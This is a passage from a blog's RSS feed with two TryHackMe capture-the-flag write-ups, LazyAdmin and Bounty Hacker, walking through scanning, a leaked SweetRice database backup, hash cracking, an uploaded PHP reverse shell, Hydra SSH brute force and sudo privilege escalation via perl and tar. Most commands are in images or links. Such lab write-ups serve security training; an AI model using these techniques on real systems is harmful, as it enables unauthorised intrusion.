<p>TryHackMe LazyAdmin is a classic story of sysadmins being lazy. Use public exploits and misconfigured settings to your advantage!</p>
<p>The post <a href="https://eric.cc/tryhackme-lazyadmin/">TryHackMe: LazyAdmin</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-lazyadmin/">TryHackMe: LazyAdmin</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading" id="introduction">Introduction</h2>



<p class="wp-block-paragraph"><a href="http://tryhackme.com/room/lazyadmin">TryHackMe: LazyAdmin</a> outlines a story as old as time. Outdated software, exposed MySQL database backups, and easy to crack passwords that spell disaster for our lazy Linux administrator. Learn what could go wrong when these elements are combined below.</p>



<h2 class="wp-block-heading" id="information-gathering">Information Gathering</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="335" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/1.-Task-1-1024x335.png?resize=1024%2C335" alt="LazyAdmin Task 1" class="wp-image-731" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/1.-Task-1.png?resize=1024%2C335&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/1.-Task-1.png?resize=300%2C98&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/1.-Task-1.png?resize=768%2C251&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/1.-Task-1.png?w=1209&amp;ssl=1 1209w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Task 1</figcaption></figure>



<p class="wp-block-paragraph">To get started, scan for the open ports and services running on those ports. It looks like SSH and a web server are running on this server. We can use a tool like <a href="https://github.com/OJ/gobuster">gobuster</a>, to brute force if there are any open directories.</p>



<figure class="wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex">
<figure class="wp-block-image size-large is-style-default"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="222" data-id="883" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/info-1024x222.png?resize=1024%2C222" alt="LazyAdmin Nmap and GoBuster results" class="wp-image-883" title="" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/info.png?resize=1024%2C222&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/info.png?resize=300%2C65&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/info.png?resize=768%2C166&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/info.png?w=1506&amp;ssl=1 1506w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<figcaption class="blocks-gallery-caption wp-element-caption">Nmap and GoBuster results</figcaption></figure>



<p class="wp-block-paragraph">Going to <code>http://10.10.222.75/content</code> we were met with SweetRice installed webpage. <a href="https://www.sweetrice.xyz/">SweetRice</a> is an open-source website management system that creates common blogs or websites. </p>



<figure class="wp-block-image size-full is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/4.-SweetRice.png?resize=642%2C172" alt="website" class="wp-image-734" style="width:642px;height:172px" width="642" height="172" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/4.-SweetRice.png?w=685&amp;ssl=1 685w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/4.-SweetRice.png?resize=300%2C80&amp;ssl=1 300w" sizes="(max-width: 642px) 100vw, 642px" /><figcaption class="wp-element-caption">website</figcaption></figure>



<p class="wp-block-paragraph">I could not find what version of SweetRice this website was running by inspecting the website&#8217;s source code.</p>



<h2 class="wp-block-heading" id="exploitation">Exploitation</h2>



<p class="wp-block-paragraph">Sometimes it is best to take a shot in the dark when trying to exploit a machine. SweetRice version 1.5.1 has a vulnerability that exposes their MySQL <a href="https://www.exploit-db.com/exploits/40718">backup file</a> for anyone to come in and download it.</p>



<figure class="wp-block-image size-full is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/7.-mysql_backup.png?resize=676%2C216" alt="mysql backup file" class="wp-image-737" style="width:676px;height:216px" width="676" height="216" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/7.-mysql_backup.png?w=676&amp;ssl=1 676w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/7.-mysql_backup.png?resize=300%2C96&amp;ssl=1 300w" sizes="(max-width: 676px) 100vw, 676px" /><figcaption class="wp-element-caption">exposed MySQL backup</figcaption></figure>



<p class="wp-block-paragraph">Going to the URL, we can find a MySQL backup file from October 29, 2019. </p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="778" height="467" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/8.-mysql-highlighted.png?resize=778%2C467" alt="sweetrice mysql leak" class="wp-image-905" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/8.-mysql-highlighted.png?w=778&amp;ssl=1 778w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/8.-mysql-highlighted.png?resize=300%2C180&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/8.-mysql-highlighted.png?resize=768%2C461&amp;ssl=1 768w" sizes="(max-width: 778px) 100vw, 778px" /><figcaption class="wp-element-caption">exposed user database</figcaption></figure>



<p class="wp-block-paragraph">Going through the MySQL file we can see the users of the website. There is a user <code>manager</code> with a convenient MD5 password hash value. We can run this hash through hashcat and crack the password to enter it into SweetRice&#8217;s admin portal.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="773" height="123" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/9.-sql-pass.png?resize=773%2C123" alt="password cracked" class="wp-image-739" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/9.-sql-pass.png?w=773&amp;ssl=1 773w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/9.-sql-pass.png?resize=300%2C48&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/9.-sql-pass.png?resize=768%2C122&amp;ssl=1 768w" sizes="(max-width: 773px) 100vw, 773px" /><figcaption class="wp-element-caption">cracked admin password</figcaption></figure>



<p class="wp-block-paragraph">Easy peasy, the administrator chose a weak password!</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="738" height="158" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/10-a.-as-directory.png?resize=738%2C158" alt="sweetrice" class="wp-image-740" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/10-a.-as-directory.png?w=738&amp;ssl=1 738w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/10-a.-as-directory.png?resize=300%2C64&amp;ssl=1 300w" sizes="(max-width: 738px) 100vw, 738px" /><figcaption class="wp-element-caption">admin dashboard url</figcaption></figure>



<p class="wp-block-paragraph">There are several ways to find the SweetRice admin portal. I found it on exploit-db when looking at SweetRice&#8217;s <a href="https://www.exploit-db.com/exploits/40716">arbitrary file upload exploit</a>. Alternatively, it could be found by recursively brute-forcing all the directories with dirbuster or looking through SweetRice&#8217;s documentation. All in all, the admin login page is located at <code>/as/</code>.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="423" height="579" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/10.-login-panel.png?resize=423%2C579" alt="LazyAdmin Sweetrice login" class="wp-image-741" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/10.-login-panel.png?w=423&amp;ssl=1 423w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/10.-login-panel.png?resize=219%2C300&amp;ssl=1 219w" sizes="(max-width: 423px) 100vw, 423px" /><figcaption class="wp-element-caption">admin dashboard login</figcaption></figure>



<p class="wp-block-paragraph">Using the username and password we just cracked, we can log into the SweetRice admin portal. Admins can Post, Change settings, and upload files.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="618" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/11.-SweetRice-manager-1024x618.png?resize=1024%2C618" alt="SweetRice dashboard" class="wp-image-742" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/11.-SweetRice-manager.png?resize=1024%2C618&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/11.-SweetRice-manager.png?resize=300%2C181&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/11.-SweetRice-manager.png?resize=768%2C463&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/11.-SweetRice-manager.png?w=1363&amp;ssl=1 1363w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">SweetRice admin dashboard</figcaption></figure>



<p class="wp-block-paragraph">We are interested in uploading files. Instead of using the arbitrary file upload exploit, I decided to use the reverse PHP shell from <a href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php">pentestmonkey</a>. They&#8217;ll both get a shell on the web server. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="345" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/13.-file-upload-1024x345.png?resize=1024%2C345" alt="File upload" class="wp-image-744" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/13.-file-upload.png?resize=1024%2C345&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/13.-file-upload.png?resize=300%2C101&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/13.-file-upload.png?resize=768%2C259&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/13.-file-upload.png?resize=1536%2C518&amp;ssl=1 1536w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/13.-file-upload.png?w=1890&amp;ssl=1 1890w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">SweetRice media center</figcaption></figure>



<h2 class="wp-block-heading" id="post-exploitation">Post Exploitation</h2>



<p class="wp-block-paragraph">After connecting to the web server. Head to the home directory and find a user named itguy and read the user.txt flag. </p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="771" height="229" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/14.-user-highlighted.png?resize=771%2C229" alt="LazyAdmin user.txt" class="wp-image-906" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-user-highlighted.png?w=771&amp;ssl=1 771w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-user-highlighted.png?resize=300%2C89&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-user-highlighted.png?resize=768%2C228&amp;ssl=1 768w" sizes="(max-width: 771px) 100vw, 771px" /><figcaption class="wp-element-caption">SweetRice user.txt</figcaption></figure>



<p class="wp-block-paragraph">Finally, to escalate our privileges to the root user run the command <code>sudo -l</code>. It will display which commands can run as a super user that does not need a password.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="774" height="136" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/15.-sudo-l.png?resize=774%2C136" alt="sudo -l" class="wp-image-749" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/15.-sudo-l.png?w=774&amp;ssl=1 774w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/15.-sudo-l.png?resize=300%2C53&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/15.-sudo-l.png?resize=768%2C135&amp;ssl=1 768w" sizes="(max-width: 774px) 100vw, 774px" /><figcaption class="wp-element-caption">sudo -l output</figcaption></figure>



<p class="wp-block-paragraph">It looks like we can run Perl as root on the itguy&#8217;s backup.pl file.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="808" height="157" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/16.-gtfobin.png?resize=808%2C157" alt="gtfobins result" class="wp-image-750" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/16.-gtfobin.png?w=808&amp;ssl=1 808w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/16.-gtfobin.png?resize=300%2C58&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/16.-gtfobin.png?resize=768%2C149&amp;ssl=1 768w" sizes="(max-width: 808px) 100vw, 808px" /><figcaption class="wp-element-caption">Perl command</figcaption></figure>



<p class="wp-block-paragraph">This is pretty straightforward. According to <a href="https://gtfobins.github.io/gtfobins/perl/#sudo">gtfobins</a>, all we will need to run the superuser do Perl command using the backup.pl file and it will run as root. Unfortunately, we only have read and execute privileges on the backup.pl file. So let&#8217;s read the file and see what backup.pl even does.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="238" height="82" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/17.-perl-priv.png?resize=238%2C82" alt="LazyAdmin perl script" class="wp-image-751"/><figcaption class="wp-element-caption">backup.pl</figcaption></figure>



<p class="wp-block-paragraph">It looks like <code>backup.pl</code> runs the script of <code>copy.sh</code>. When going over to the /etc/ directory it looks like we have read, write, and execute permissions on the <code>copy.sh</code> file. The plan is to overwrite the file with a reverse shell, run the <code>backup.pl</code> as root, and connect the server to our client as root.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="770" height="82" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/18.-copy-highlighted.png?resize=770%2C82" alt="LazyAdmin copy.sh" class="wp-image-908" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/18.-copy-highlighted.png?w=770&amp;ssl=1 770w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/18.-copy-highlighted.png?resize=300%2C32&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/18.-copy-highlighted.png?resize=768%2C82&amp;ssl=1 768w" sizes="(max-width: 770px) 100vw, 770px" /><figcaption class="wp-element-caption">copy.sh</figcaption></figure>



<p class="wp-block-paragraph"><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-openbsd">Payload all the things</a> is an open-source resource with hundreds of ways to create a reverse shell. I first tried the netcat traditional commands. However, after running them it said that the version of netcat the server was using was netcat-openbsd package.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="490" height="46" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/22.-sudo-perl.png?resize=490%2C46" alt="" class="wp-image-752" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/22.-sudo-perl.png?w=490&amp;ssl=1 490w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/22.-sudo-perl.png?resize=300%2C28&amp;ssl=1 300w" sizes="(max-width: 490px) 100vw, 490px" /><figcaption class="wp-element-caption">running backup.pl</figcaption></figure>



<p class="wp-block-paragraph">Running the command exactly how it is written out in the <code>sudo -l</code> output is the only way for the terminal not to prompt with password input.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="490" height="195" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/24.-root-highlighted.png?resize=490%2C195" alt="LazyAdmin root.txt" class="wp-image-909" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/24.-root-highlighted.png?w=490&amp;ssl=1 490w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/24.-root-highlighted.png?resize=300%2C119&amp;ssl=1 300w" sizes="(max-width: 490px) 100vw, 490px" /><figcaption class="wp-element-caption">SweetRice root.txt</figcaption></figure>



<p class="wp-block-paragraph">Lastly, launching another shell on my attacker machine and running the Perl command, I became root. It&#8217;s now as easy as going to the root directory and reading the root.txt flag.</p>



<h2 class="wp-block-heading" id="conclusion">Conclusion</h2>



<p class="wp-block-paragraph">This is a scenario that would most certainly happen in the real world. It doesn&#8217;t necessarily have to come down to laziness, projects come and go. IT staff need to be aware when this happens and take the necessary steps to avoid running vulnerable software on their systems.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="311" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/25.-Task-1-Solutions-1024x311.png?resize=1024%2C311" alt="LazyAdmin Task 1 Solutions" class="wp-image-747" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/25.-Task-1-Solutions.png?resize=1024%2C311&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/25.-Task-1-Solutions.png?resize=300%2C91&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/25.-Task-1-Solutions.png?resize=768%2C233&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/25.-Task-1-Solutions.png?w=1212&amp;ssl=1 1212w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Task 1 Solution</figcaption></figure>
<p>The post <a href="https://eric.cc/tryhackme-lazyadmin/">TryHackMe: LazyAdmin</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-lazyadmin/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">436</post-id>	</item>
		<item>
		<title>TryHackMe: Bounty Hacker</title>
		<link>https://eric.cc/tryhackme-bounty-hacker/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-bounty-hacker</link>
					<comments>https://eric.cc/tryhackme-bounty-hacker/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Wed, 28 Sep 2022 14:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=493</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-bounty-hacker/">TryHackMe: Bounty Hacker</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>TryHackMe Bounty Hacker is an easily guided challenge. It involves enumeration, cracking passwords, and Linux privilege escalation!</p>
<p>The post <a href="https://eric.cc/tryhackme-bounty-hacker/">TryHackMe: Bounty Hacker</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-bounty-hacker/">TryHackMe: Bounty Hacker</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading">Introduction</h2>



<p class="wp-block-paragraph">It looks like our bragging brought the attention of Spike Spiegal and his crew, the TryHackMe: Bounty Hacker. They need us to <a href="https://tryhackme.com/room/cowboyhacker">hack and gain root in this system</a> no questions asked.  With some enumeration and an anonymous FTP account, we can crack the SSH passphrase to become a user on the system and exploit tar to escalate our privileges to root. </p>



<h2 class="wp-block-heading">Information Gathering</h2>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="681" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1-1024x681.png" alt="Bounty Hacker Task 1 " class="wp-image-838" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1.png?resize=1024%2C681&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1.png?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1.png?resize=768%2C511&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1.png?w=1209&amp;ssl=1 1209w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Task 1</figcaption></figure>



<p class="wp-block-paragraph">Like any other challenge, I want to get the lay of the land.  We are looking for any open ports and what kind of services they are running. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="768" height="586" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/nmap.png" alt="Bounty Hacker nmap results" class="wp-image-839" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/nmap.png?w=768&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/nmap.png?resize=300%2C229&amp;ssl=1 300w" sizes="(max-width: 768px) 100vw, 768px" /><figcaption class="wp-element-caption">Nmap results</figcaption></figure>



<p class="wp-block-paragraph">Nice! It looks like they left an anonymous account enabled on their FTP server. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="547" height="436" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/ftp.png" alt="anonymous ftp" class="wp-image-841" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/ftp.png?w=547&amp;ssl=1 547w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/ftp.png?resize=300%2C239&amp;ssl=1 300w" sizes="(max-width: 547px) 100vw, 547px" /><figcaption class="wp-element-caption">ftp</figcaption></figure>



<p class="wp-block-paragraph">These files look interesting: <code>locks.txt</code> and <code>task.txt</code>. I will just go ahead and download that onto my system and give them a read.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="267" height="452" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/07/locks.txt.png" alt="Bounty Hacker locks.txt" class="wp-image-862" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/07/locks.txt.png?w=267&amp;ssl=1 267w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/07/locks.txt.png?resize=177%2C300&amp;ssl=1 177w" sizes="(max-width: 267px) 100vw, 267px" /><figcaption class="wp-element-caption">locks.txt</figcaption></figure>



<p class="wp-block-paragraph">Score! This file looks like it contains passwords. Not sure which is the right one but let us check out the <code>task.txt</code> for further clues.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="324" height="119" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/task.txt.png" alt="Bounty Hacker task.txt" class="wp-image-842" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/task.txt.png?w=324&amp;ssl=1 324w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/task.txt.png?resize=300%2C110&amp;ssl=1 300w" sizes="(max-width: 324px) 100vw, 324px" /><figcaption class="wp-element-caption">task.txt</figcaption></figure>



<p class="wp-block-paragraph">Now, if you have never seen the show there is some context to the message. Vicious, the main antagonist in Cowboy Bebop and Red Eye, is an illegal performance-enhancing drug.  Lin is one of Vicious&#8217;s henchmen and I would be willing to bet that he was the one that set up this server.</p>



<p class="wp-block-paragraph">Going back to our Nmap scan, we can see that SSH is running on the machine. Using a tool like <a href="https://www.kali.org/tools/hydra/">Hydra</a>, we can use the passwords found in <code>locks.txt</code> and brute force our way into Lin&#8217;s account.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="781" height="315" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/hydra.png" alt="Bounty Hacker hydra results - cracked user password" class="wp-image-843" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/hydra.png?w=781&amp;ssl=1 781w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/hydra.png?resize=300%2C121&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/hydra.png?resize=768%2C310&amp;ssl=1 768w" sizes="(max-width: 781px) 100vw, 781px" /><figcaption class="wp-element-caption">hydra results</figcaption></figure>



<p class="wp-block-paragraph">And just like that, we have Lin&#8217;s login information! </p>



<h2 class="wp-block-heading">Exploitation</h2>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="615" height="328" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/user.txt.png" alt="Bounty Hacker user.txt flag" class="wp-image-844" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/user.txt.png?w=615&amp;ssl=1 615w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/user.txt.png?resize=300%2C160&amp;ssl=1 300w" sizes="(max-width: 615px) 100vw, 615px" /><figcaption class="wp-element-caption">user.txt</figcaption></figure>



<p class="wp-block-paragraph">The <code>user.txt</code> flag is found immediately in lin&#8217;s home directory. The last thing we need to do is escalate our privileges and read the <code>root.txt</code> flag.</p>



<h2 class="wp-block-heading">Post Exploitation</h2>



<p class="wp-block-paragraph"><code>Sudo -l</code> allows us to list the allowed commands the user can invoke with root privileges.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="747" height="148" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/sudo-l.png" alt="linux privilege escalation" class="wp-image-845" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/sudo-l.png?w=747&amp;ssl=1 747w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/sudo-l.png?resize=300%2C59&amp;ssl=1 300w" sizes="(max-width: 747px) 100vw, 747px" /><figcaption class="wp-element-caption">sudo -l</figcaption></figure>



<p class="wp-block-paragraph">The <code>tar</code> command is used to compress a group of files into an archive. Let&#8217;s check out GTFObins to see if there are any commands we can leverage to our advantage.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="818" height="168" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/gtfobins.png" alt="ghostbin - sudo command for (root) /bin/tar" class="wp-image-846" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/gtfobins.png?w=818&amp;ssl=1 818w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/gtfobins.png?resize=300%2C62&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/gtfobins.png?resize=768%2C158&amp;ssl=1 768w" sizes="(max-width: 818px) 100vw, 818px" /><figcaption class="wp-element-caption">ghostbins</figcaption></figure>



<p class="wp-block-paragraph">There is a couple of things going on in this command. First, tar is creating an archived file at /dev/null. Since it is running in super user do, spawning a bash shell at checkpoint 1 makes it possible to escalate our privileges to root.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="776" height="133" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/root.txt.png" alt="Bounty Hacker root.txt flag" class="wp-image-848" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/root.txt.png?w=776&amp;ssl=1 776w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/root.txt.png?resize=300%2C51&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/root.txt.png?resize=768%2C132&amp;ssl=1 768w" sizes="(max-width: 776px) 100vw, 776px" /><figcaption class="wp-element-caption">root.txt</figcaption></figure>



<p class="wp-block-paragraph">And there you have it! The <code>root.txt</code> flag file is easy to find in the root directory.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">In conclusion, this TryHackMe room earns its easy badge. Enumeration and privilege escalation was pretty straightforward and a piece of cake for this braggadocious hacker.</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1-Solutions-1024x681.png" alt="Bounty Hacker Task 1 Solutions" class="wp-image-849" style="width:840px;height:558px" width="840" height="558" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1-Solutions.png?resize=1024%2C681&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1-Solutions.png?resize=300%2C199&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1-Solutions.png?resize=768%2C511&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1-Solutions.png?w=1211&amp;ssl=1 1211w" sizes="(max-width: 840px) 100vw, 840px" /><figcaption class="wp-element-caption">Task 1 Solutions</figcaption></figure>
<p>The post <a href="https://eric.cc/tryhackme-bounty-hacker/">TryHackMe: Bounty Hacker</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-bounty-hacker/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">493</post-id>	</item>
		<item>
		<title>TryHackMe: RootMe</title>
		<link>https://eric.cc/tryhackme-rootme/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-rootme</link>
					<comments>https://eric.cc/tryhackme-rootme/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Wed, 23 Feb 2022 15:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
